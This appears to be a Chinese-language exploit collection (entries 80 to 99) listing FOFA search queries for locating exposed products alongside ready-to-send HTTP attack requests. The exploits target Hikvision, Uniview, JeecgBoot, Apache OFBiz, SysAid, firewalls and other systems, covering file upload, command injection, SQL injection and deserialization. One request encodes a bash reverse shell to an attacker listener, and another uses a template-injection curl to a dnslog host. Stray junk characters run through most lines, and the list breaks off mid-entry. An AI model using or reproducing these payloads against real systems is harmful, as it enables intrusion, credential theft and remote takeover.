& j" u* y( E6 n" x7 qHost:IP' F1 p, n8 d; G, w" y9 ~# o7 V7 ^9 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
: A" o7 M8 q& F% mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
q/ Z' n9 \. G$ eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 W% k' u, ]$ {1 H2 m3 D! \9 fAccept-Encoding: gzip, deflate
0 |0 k/ h# Z6 wConnection: close! u6 x# M; \9 w. w- g: f% G
Upgrade-Insecure-Requests: 1
4 _" r6 O; g+ d1 Y: W
" X' z& V" b% N; x8 B% L1 p g0 V6 _0 y" t) [; b& S& D
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
8 s2 }3 |; P% R' j) d' L: V- bFOFA:app="速达软件-公司产品"
4 w% L# W; |5 zPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
) y2 k% z: V% O0 d, p& jHost: x.x.x.x' X5 X! u" w' g/ S& S$ c1 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( f) J) f: k% _: P6 @7 d
Content-Length: 27( \! d& d; ~% \% S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. i3 E. V6 Y9 ^) _* f1 j$ t" u7 }Accept-Encoding: gzip, deflate
$ R. ]6 q! }( IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ~5 G. T; I Y! a- P& ^; o* h2 Z9 i
Connection: close1 o1 N( Q% h" _8 s7 O
Content-Type: application/octet-stream$ x$ u/ B) x' M
Upgrade-Insecure-Requests: 1- m5 A1 g8 q1 b9 V0 z8 D( T, l' Z& R
8 s. G5 V; q0 r3 N5 y9 p2 u9 U; M
<% out.print("oessqeonylzaf");%>7 J$ j* L6 f3 p) M \( x* w
: ?5 | `/ k' B, C& G
5 j4 R4 y. U/ y/ W# C
GET /xykqmfxpoas.jsp HTTP/1.1
: u# b( T! _; G9 X0 \. b6 ?, xHost: x.x.x.x& j! X1 v, m$ R- m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" _ s: Y% ?! A5 g6 r
Connection: close% @2 R- A: D' L6 X
Accept-Encoding: gzip8 J0 ]5 ^, e3 B1 ~5 x0 V' {& E
- T; |; x3 x; w" b' P5 b6 x# x
u) Y1 b5 N4 _* ^. ]4 k) w' Y: o ]81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- a& p6 N, f5 N$ t7 VFOFA:app="uniview-视频监控"; T. m5 B% V- ~. n; T; `1 \; v
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
/ S+ N/ `2 q* ^8 r) P! U3 U: WHost: x.x.x.x6 o6 p: X$ [0 p5 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 x$ d: F8 k9 W( p' d% r6 ]5 _Connection: close
$ ~5 R9 b4 ?3 y# N: L DAccept-Encoding: gzip
0 Y: ?. v2 v3 v/ ~$ Z( K! }
- {& H5 g; z$ D5 t( Q
; h/ ]* u" J* i/ S6 a82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 r6 R& A! k: `
FOFA:app="思福迪-LOGBASE"1 m' {. Y1 A( h$ L$ L& ?: A% M7 |
POST /bhost/test_qrcode_b HTTP/1.1, x- x5 ]" K+ {" V, t
Host: BaseURL# B9 P0 Y5 a4 s: J
User-Agent: Go-http-client/1.11 A Y) D% w7 Z L$ t O5 [' B( S
Content-Length: 23
, g7 Z3 K/ N0 aAccept-Encoding: gzip
# }2 w R/ J5 v+ ~Connection: close( R+ @- ^& p* T; h0 X
Content-Type: application/x-www-form-urlencoded, F/ k+ @3 N) u3 B
Referer: BaseURL6 q- h0 M) N: X" M- }! C
, }2 V* ?, }" A) X7 K! _3 ^$ B% V
z1=1&z2="|id;"&z3=bhost' ]- u: d- Q7 A2 o$ R5 c
3 a8 ?$ {% k" s% S y9 Q4 I
. k4 K$ Y: b7 @' x0 C2 s+ R; r83. JeecgBoot testConnection 远程命令执行
. a" R! b: \- g9 nFOFA:title=="JeecgBoot 企业级低代码平台"1 @9 `- `1 [& n) J2 H) `
) w% g, {- ^: [( G6 N) o7 e
/ e/ g) F: b- UPOST /jmreport/testConnection HTTP/1.1, P3 I3 h$ ^1 P/ C
Host: x.x.x.x
+ s) A* ~+ O$ d- p# OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 F4 i% ^) g+ P; V1 J" A0 I
Connection: close
2 C' J6 T' j5 g/ ^! \Content-Length: 8881. l" R5 f5 Z( m% [4 o( q8 d3 h4 C
Accept-Encoding: gzip9 J0 ? g0 B. e
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO". Y* z) R: s* W9 K9 B& O% G, Y+ ^% L% D
Content-Type: application/json
& W8 ]6 G3 G3 j: f. z9 z& W$ d L' R! L( b' Q- \2 F# y' g( B
PAYLOAD
$ f6 P; e0 d) p) c# h( t7 {4 Y2 u8 z r* q- Y! u% s* w
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. A+ \6 z1 D3 w* K
FOFA:title=="JeecgBoot 企业级低代码平台"
6 c8 J* S, s3 v- c! m" w c* d% Z( J$ G5 n+ ~
1 w; ?0 u4 t, _' z6 L5 B* j$ }* M, f
( Z. l! X# G* ^3 H; sPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
6 s3 @5 o- t' m9 ~. LHost: 192.168.40.130:8080
5 ?- {& O3 r# M, |# z; KUser-Agent: curl/7.88.1
0 j1 G% q4 E" q& E* sContent-Length: 156
+ P" p" @, G8 ]$ TAccept: */*8 m6 {: v% z( a; w
Connection: close9 P6 z% i7 i- b+ n0 U& R! e; k
Content-Type: application/json# [) a% q+ s" I, `5 \& ]$ E1 D
Accept-Encoding: gzip
: u' m- v# |; I+ S
- s6 ~% {2 L5 A6 k{7 a6 \+ W9 }4 d8 G8 Z
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
7 ]& X% Y' Y/ T- Q) t) d( F "type": "0"" T/ W2 ^7 H2 m
}; X/ V4 h( |. ^2 J; S# t7 C! r6 T
3 X/ K1 }- I; G: ^+ ^
& {3 t7 k9 g2 P' W85. SysAid On-premise< 23.3.36远程代码执行
# f0 G2 ]2 q7 v1 }CVE-2023-47246. Y0 H, r& a- d+ e( L
FOFA:body="sysaid-logo-dark-green.png" 2 z9 @% a7 l" Z6 l0 {+ G
EXP数据包如下,注入哥斯拉马8 q6 p' w- X) I7 o- ]8 p. p
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1 L) {+ X7 I! T. i8 ^+ n ?
Host: x.x.x.x
! D9 s' g' \2 l4 E3 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: F0 I! `, {% x( @9 F. \$ w
Content-Type: application/octet-stream
7 N `$ _3 m2 b2 a v5 e% S# G8 yAccept-Encoding: gzip
5 f9 i; s! f% V
/ g$ n1 S7 n$ EPAYLOAD
, G' V: s3 a+ [9 m# W- g; _4 C s# L9 }' c
回显URL:http://x.x.x.x/userfiles/index.jsp
6 _0 ~8 [$ l/ n# `
* m& e, f4 U% Z% `86. 日本tosei自助洗衣机RCE
6 ~8 N( W& Q( WFOFA:body="tosei_login_check.php"8 h }+ w2 ^7 f! @- f
POST /cgi-bin/network_test.php HTTP/1.1, j) `; D/ P) I/ L
Host: x.x.x.x
, I* J" h+ E+ e( u; q6 x& l# oUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36* V. s" r3 f- F8 |; \
Connection: close' ?9 i6 D& `1 U/ X* T8 t5 Y- R
Content-Length: 44/ @ M. Q* }! ~: ^0 x& d' U
Accept: */*5 Q( U5 m( i) r3 i) L3 u& T
Accept-Encoding: gzip
( O) s! J' l4 D: T# xAccept-Language: en
' G/ @# e: S7 A% uContent-Type: application/x-www-form-urlencoded
7 P# c; o* t0 G, E
* C$ O$ Y6 t2 y; ?host=%0acat${IFS}/etc/passwd%0a&command=ping
" O9 d( z& b8 W+ h4 A2 H& C6 n" s2 z% f( M1 Q, N
+ T5 P3 t' a* v2 D3 O/ e% B
87. 安恒明御安全网关aaa_local_web_preview文件上传3 y" b6 L) R3 \6 e" m: H
FOFA:title="明御安全网关"
, g. h4 C/ V! K n' }+ [7 ZPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
8 m8 \! Z) ]* b0 c! b9 SHost: X.X.X.X9 ]( V! m- f$ E6 P2 H: k, Q* B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' w- S6 i5 ^: FConnection: close* G: f$ I) ~ C( U. w
Content-Length: 198
, M# l( ]# [: ?. a. ]/ o |' K8 `Accept-Encoding: gzip# X8 i+ {0 w& R" m. x8 [9 j
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
# g6 _& V' R0 O
( L* @" G; x5 F" c' s--qqobiandqgawlxodfiisporjwravxtvd" O: G6 ~# K1 b+ `/ t4 s) v
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
' Q) V, z9 G5 ~" s# n/ U- @7 U8 u5 mContent-Type: text/plain! | m! d( \- f: J/ o3 r; ^& n$ y
9 v. n, n) ?& t' Z' A: m* O3 v2ZqGNnsjzzU2GBBPyd8AIA7QlDq
1 i! v+ f4 [7 Q3 q--qqobiandqgawlxodfiisporjwravxtvd-- R- y- w4 ^& ]+ l! }3 f
/ F$ G- l8 i* l: I) h$ ?, ]
' _+ t7 s; R' m
/jfhatuwe.php& p6 s3 g2 e: }. M
" Q* h. u; u1 S1 X8 y+ f
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
5 n1 u. m- D5 z, C1 wFOFA:title="明御安全网关"
9 u* W8 @9 \# [! D- KGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.15 X2 _: s1 j6 w8 |
Host: x.x.x.xx.x.x.x
- B" M5 k+ i# a/ c* K/ @/ K# UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ V0 Z2 ?0 n. ^3 ?$ Z" R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) L+ m) S. V/ \) @
Accept-Encoding: gzip, deflate- L! S: F* N% i9 {0 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" {9 g; S& V! {& v8 {) u7 H5 ^Connection: close, a& e8 X& y6 q
/ L, `# P/ z: i. B' k; y2 w% v8 d7 P" z
/astdfkhl.php
+ P- a/ Z0 E- y+ l: h8 t3 i1 `8 g# q' C
89. 致远互联FE协作办公平台editflow_manager存在sql注入- B2 {8 L# U1 {8 _* ~0 l
FOFA:title="FE协作办公平台" || body="li_plugins_download"8 w2 B$ g t) \4 Q( O: Z+ G
POST /sysform/003/editflow_manager.js%70 HTTP/1.1% B6 v4 `! k* q( v+ z: Q2 `
Host: x.x.x.x
) Z- H; Y& V0 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ g0 l {0 y. B! t0 @0 v7 s7 I1 GConnection: close6 z6 w2 y9 H$ g( r9 Q4 c% _$ X0 X
Content-Length: 41* c7 U' A R; r2 y1 b
Content-Type: application/x-www-form-urlencoded" h. S2 q$ F* T5 J6 F- u* F
Accept-Encoding: gzip
- Z- d$ V4 J! n! m. i- c: p& Y E A/ f; i' E
option=2&GUID=-1'+union+select+111*222--+7 `: u- u% m4 e. `5 o( }
: @3 C; a; c( B$ Y* E" M. u R0 C& O. W1 z- w' N7 J
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行5 ^9 G9 N: [ W3 K( f$ M
FOFA:icon_hash="-1830859634"
0 }9 f1 @/ k; k" v. f) k" [POST /php/ping.php HTTP/1.1
, y; E, |. @) e/ u2 l: [Host: x.x.x.x
5 g6 J, I2 A1 z l& |7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
3 {" Q" U- y" c, a: j& A) ~Content-Length: 51
8 u* ]. X: ~" r2 ?8 c- x% t# z( CAccept: application/json, text/javascript, */*; q=0.01
+ W: @$ ^* o9 w3 J5 aAccept-Encoding: gzip, deflate2 w0 f" U ]0 ^0 Y* c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 @, ^3 n1 b+ C9 F; ~8 MConnection: close
- j+ s. i& c5 h m5 sContent-Type: application/x-www-form-urlencoded/ x8 ^; l3 M9 t0 x3 K; ~
X-Requested-With: XMLHttpRequest
% Z$ [! p! ^4 J. |+ M, i4 j# p- H( d# Z! o& C5 w4 g+ n. ~2 w* O( ~
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig: `, |/ v3 |) N; h' f* n
4 [1 g9 N6 l: e/ z4 Y* ?, l. C
6 F( A5 ^( m/ A4 |! o, I$ Z91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
0 Z5 c1 \( e% A0 VFOFA:title="综合安防管理平台"
9 v/ I; N5 C+ wGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
8 N/ }5 I# u4 b5 Y8 \" o* MHost: your-ip
' ?7 s, v1 F" a, dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0 K, h0 u: G. i/ k$ r3 i* DAccept-Encoding: gzip, deflate2 \" H2 [* M( q) b( u! w
Accept: */*" @; u7 `5 z) M, L0 v
Connection: keep-alive6 M4 a2 |- d0 |, r8 ], x$ N
/ ^; m2 I, }+ a( u
- ]& o) P3 T+ K7 {# o, L( ~. S2 t2 q0 \; p6 J h
92. 海康威视运行管理中心session命令执行( D8 h" B1 i9 o- k4 J# u9 }0 Z+ Z- I
Fastjson命令执行
; P* D( z2 b, ~; t4 v8 lhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"! K& B3 e: g8 u; A
POST /center/api/session HTTP/1.1
+ M( Y7 u* Q9 L/ [4 NHost:
1 H8 ~3 w) v; x8 AAccept: application/json, text/plain, */*
5 d! ~2 y( e ?4 F2 EAccept-Encoding: gzip, deflate
9 j7 B$ [: }" J JX-Requested-With: XMLHttpRequest
% C3 y( b1 `( q5 ?/ g uContent-Type: application/json;charset=UTF-8
: i0 E' x. q8 F, d' t+ f5 ]X-Language-Type: zh_CN
( x- I9 B! |$ k" n6 Z x" H; ?Testcmd: echo test9 s) ?5 l; k+ q1 E# t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
% R: g# |1 I; t; bAccept-Language: zh-CN,zh;q=0.9) f6 B. o" Q) A O! `% h4 o1 H- ?
Content-Length: 5778 e8 z2 a% A$ @4 t W
8 P. H+ u! F8 W; cPAYLOAD
& ]# p/ R! N9 v O* U5 p% t, q6 m4 P4 n
, C- E+ R* t3 ]7 @
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
$ ~9 q2 F: N. p7 U& W: ]7 JFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
& r; J2 v: F( U% t$ W+ cPOST /?g=app_av_import_save HTTP/1.1
" w0 z7 S* H# Q% C# n5 j' gHost: x.x.x.x
1 M' Z) w) g, N7 x# L3 JContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
# A% j! I; r5 `, C4 n; ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% V8 J$ o& V, e2 @& j. ~5 ^8 I
------WebKitFormBoundarykcbkgdfx* H, j, O S- S2 ^$ E4 j
Content-Disposition: form-data; name="MAX_FILE_SIZE"! N7 v) d" z: n5 T {7 D
1 X# \! }0 I9 C% d; e10000000( f- z1 ^6 A8 `, p& m1 g7 ?
------WebKitFormBoundarykcbkgdfx5 M, P n' j. E( ^
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
9 r" i/ c8 ~4 QContent-Type: text/plain
! Y; f6 { m+ j# B) u
8 D% N7 L0 S; }$ Mwagletqrkwrddkthtulxsqrphulnknxa. o/ f- U$ _) M2 S( e! _$ c
------WebKitFormBoundarykcbkgdfx
4 I9 ~: ~# n6 P2 D9 e( L9 gContent-Disposition: form-data; name="submit_post"
+ a$ i- K4 @. C+ s' ^
% L( |1 B) z. Hobj_app_upfile
& M% L$ ]" M5 _------WebKitFormBoundarykcbkgdfx
5 ]% |$ K( r/ s6 VContent-Disposition: form-data; name="__hash__"
& y/ G( S$ K$ @3 K' R1 n
3 \0 D/ C$ `; B% ~! E) b8 n) n( u! M" ~0b9d6b1ab7479ab69d9f71b05e0e94459 d# x1 w+ y3 t$ W4 E/ v$ R5 b( Q$ R6 V" ^
------WebKitFormBoundarykcbkgdfx--# \( }1 f0 {% O( h
7 f5 H* V8 X6 U' }* v. e$ m
% E4 o" V, o6 ]% _! w
GET /attachements/xlskxknxa.txt HTTP/1.1
) J9 \+ Z' v! ], G8 f1 _6 gHost: xx.xx.xx.xx* A3 @; o6 N; @, q* S2 G! u; C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" e* M' b# ]/ t, e7 \
6 N6 u/ Z5 g' j) k. y+ \$ P- Z1 ^ Z) {, s8 D) z# h
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" i* g' f6 e Z7 o$ T8 }
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
9 @8 V' s# X8 G1 s( wPOST /?g=obj_area_import_save HTTP/1.1
. t" t& K/ G' j; v! j2 C2 Q& S% vHost: x.x.x.x
9 L$ b2 o& e0 ]1 oContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt3 ?. @" a% A5 w. V2 T: ]7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
, x; n2 s' Y0 y3 F! A9 y7 L& E {) o2 E u8 o
------WebKitFormBoundarybqvzqvmt" j3 K7 _+ I* U d# t
Content-Disposition: form-data; name="MAX_FILE_SIZE"
, X5 L; Z- u% q. b6 x- J& s+ |+ r) l
10000000& A0 W' C. f% Y' o! q: J
------WebKitFormBoundarybqvzqvmt. R5 G% X B6 J! r% Q
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"4 a$ u! B3 ]# b* P2 O# k, P
Content-Type: text/plain
9 a0 i! D# ?4 D. v' ~/ D/ r6 t$ V/ a! z# y2 F
pxplitttsrjnyoafavcajwkvhxindhmu$ E) n5 p7 a j& e& x- K
------WebKitFormBoundarybqvzqvmt) z# C8 q/ ]8 r, n) N! s
Content-Disposition: form-data; name="submit_post"' r9 G7 ~1 x( ?' {) r( V D
1 I' y5 R% |) D5 `% ]8 wobj_app_upfile
, D; c* O: v5 h. ?( U' s------WebKitFormBoundarybqvzqvmt( v2 ] ^3 O9 \. h l
Content-Disposition: form-data; name="__hash__"
! T1 Q: Q+ Y1 V3 D9 a3 `: s5 l! d+ X7 _7 c0 P( {
0b9d6b1ab7479ab69d9f71b05e0e94459 o1 ~% u+ A" {) J
------WebKitFormBoundarybqvzqvmt--
% n& o/ U" B6 X: E+ d& h2 Q. Q$ l( T0 Y
, ^) x: F6 T& b
% S- K# o# v: j" t1 PGET /attachements/xlskxknxa.txt HTTP/1.1
/ y5 B0 j) G$ A YHost: xx.xx.xx.xx
! q7 T- n4 S7 B6 P4 Q/ _- e8 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 j1 T+ S$ Z2 _( D' `9 }0 d# y ]6 v# x, P
( Y' J$ [; V4 {' t2 h5 n, k
7 W& N0 Y0 J0 `! M, y7 K
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行7 e' ?) i5 O J( r: q1 ?" u/ d0 E
CVE-2023-49070
' [$ W _4 l1 V) hFOFA:app="Apache_OFBiz"- V- t* W R+ R( U" w
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: X; h/ r% L* h3 }% v
Host: x.x.x.x6 |& N% Z1 T+ Z$ ]" K% K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ v5 |: |& @0 X4 w
Connection: close( U" u& B3 e% l
Content-Length: 889/ Z- U! S/ E8 c
Content-Type: application/xml* P; U' p% a% B" L* G
Accept-Encoding: gzip' D Q. M$ ?4 b$ p6 k+ }5 h' e. U9 W
5 ]- E- ~3 D3 ^$ J0 w% a* Q<?xml version="1.0"?>$ C' a7 c1 ]4 g+ i
<methodCall>1 ]) \4 `& r' L) {. o
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
$ ?+ j5 ]5 c, H, s9 C! l) j2 F) e <params>/ A0 T! u8 h& `
<param>
; J2 y- E. `+ `( O3 i- X3 g <value>
, J0 m: X: I1 O, M1 ^. a: w" y6 ^ <struct>
8 G) X* X% x9 q3 V( I <member>( @1 J7 ]3 b1 E$ F, W
<name>test</name>
+ ~' d& Y s4 }5 s* _2 J8 d <value>8 y& j, Q7 i2 X2 U+ U" G
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>! \2 i" c5 B% q
</value>
- y8 l9 |# x$ M8 U8 O </member>
" r. x; F# k* t9 t$ k m, E </struct>
/ l. R. j; j( @- j5 Y </value>
. O' O* y4 r0 r7 L% X+ q$ _ </param># J5 D) }/ n- @+ N( x2 w8 }* o
</params>; L/ a$ R9 l& E- ~
</methodCall>
7 \+ l- ?! i! @: m. P7 G+ o9 s/ K5 P" B9 D% C/ X
; u$ l, v) |7 v. R
用ysoserial生成payload
" f8 L" _, \* C5 I* sjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"# i; n3 m6 f6 z1 S/ d) `% t
& Y* ]% n" x6 z1 w, a
4 W9 m1 q0 |& z9 G# T6 j( x将生成的payload替换到上面的POC
+ V/ V6 d* M( M% uPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
4 L% I. g3 N$ L, a2 WHost: 192.168.40.130:8443* a0 W% Z2 n& @6 q' j2 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.360 r# d8 D. x& R6 M: u- ^
Connection: close3 n$ J( t* | F: W
Content-Length: 889( r$ ^1 @/ o6 \
Content-Type: application/xml
+ T" ~0 e" z7 D l/ f- O5 }% Q fAccept-Encoding: gzip0 E; J* U( Q% S# L
; U: @1 C) b/ ?4 a
PAYLOAD: e3 g& ?+ y0 F
, E+ O9 ^+ T( y* o* m$ D) M/ T
96. Apache OFBiz 18.12.11 groovy 远程代码执行
4 U$ v. V9 S$ B1 F# g; c/ w3 IFOFA:app="Apache_OFBiz"
5 Y4 z- W4 b1 z- N+ hPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% _: a% v! l- B+ a* S
Host: localhost:84435 i) T; d: ?! e4 w. J( b9 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 z3 }) D% l& f a! WAccept: */*; C+ m! d1 I3 K0 J. h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: i4 K a6 \& ? B/ s$ ^/ QContent-Type: application/x-www-form-urlencoded `# v6 b9 y! m
Content-Length: 557 q+ h/ D- l i' f D6 T( b* d9 A4 f* `
U5 ^$ F, Z' w, Z' Z3 r
groovyProgram=throw+new+Exception('id'.execute().text);
" I7 N5 y. _6 j; ?# M2 D# y$ F1 q$ H/ g3 Z; A
: K- ~. D4 h, O7 Y0 _; N
反弹shell: g: O0 J: W$ o2 W' k0 a& o" M, C
在kali上启动一个监听) q9 P6 W8 t/ W
nc -lvp 7777 U) s+ H# Z! s3 D6 M
6 ^- [: D3 r7 a N7 JPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1/ g( E0 a }; y0 b/ R& N2 c( z3 a
Host: 192.168.40.130:8443/ r) c' l0 }; n% X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% ~$ v9 A0 q3 ~7 E8 q! TAccept: */*6 k" J! }$ N2 _7 ?( U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! M3 j- }) w5 b v% D4 f- u. P
Content-Type: application/x-www-form-urlencoded
% z, z0 K" A0 B0 x( r2 M2 y; S aContent-Length: 717 @* e, j: s! ^5 q9 D! R ]
, ~/ @7 u. ^+ NgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();0 g& a/ X9 Z R( s2 M1 \3 J
* y$ J' h2 j' j. s8 S9 u& P h: F97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行0 C2 G N. {" a
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
) p# C) V q( z" t! F! \GET /passport/login/ HTTP/1.1
# k- D. }* F7 y3 R# `3 C5 GHost: 192.168.40.130:8085! x& r9 X/ f3 t5 J7 U, r+ b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 x3 A2 N! j5 F+ l/ s" T, ~7 fAccept-Encoding: gzip
5 n' D! h4 C$ P7 oConnection: close
% b P& V* f: j2 iCookie: rememberMe=PAYLOAD1 s6 f% h; |. h; l2 S v, f
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"; u1 I0 o; c8 ]) H, [! s
) u0 ?" a7 u# V3 ?
9 \# ]& i3 j1 z& c& @2 x- A; e
98. SpiderFlow爬虫平台远程命令执行
8 K" f" A# i# _1 sCVE-2024-0195
* }9 J/ b; Z' @, B2 a S* A* PFOFA:app="SpiderFlow"
) `4 S8 L2 ^+ k8 hPOST /function/save HTTP/1.1' q# v/ p6 F8 e7 v y. S
Host: 192.168.40.130:80882 x, r* G+ w* y+ N `( ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" L4 Y! t# V7 m: P n8 K* p
Connection: close+ G4 Y g/ i9 b6 C, j& b6 P
Content-Length: 121# U% j. r! D; k- w$ ~( F$ o) s
Accept: */*
. A4 i% T8 u! N2 m2 n" x+ KAccept-Encoding: gzip, deflate5 e( D# P8 f7 Z9 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 Q8 ^* L% u/ m. ~7 qContent-Type: application/x-www-form-urlencoded; charset=UTF-8
# a e5 @9 g) f+ AX-Requested-With: XMLHttpRequest: o; V+ Z9 ?- O4 A3 @
) g1 b: d! m C2 Y4 M+ f) o6 v
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
# I1 I0 P* B! Z9 \0 }7 k- Z9 I! V2 R) e7 U5 N3 v
' R; d; S% s4 m1 Z8 \
99. Ncast盈可视高清智能录播系统busiFacade RCE: |# G( L, W0 k+ p
CVE-2024-03053 {+ [. y( V0 R; A' d* f, q0 j
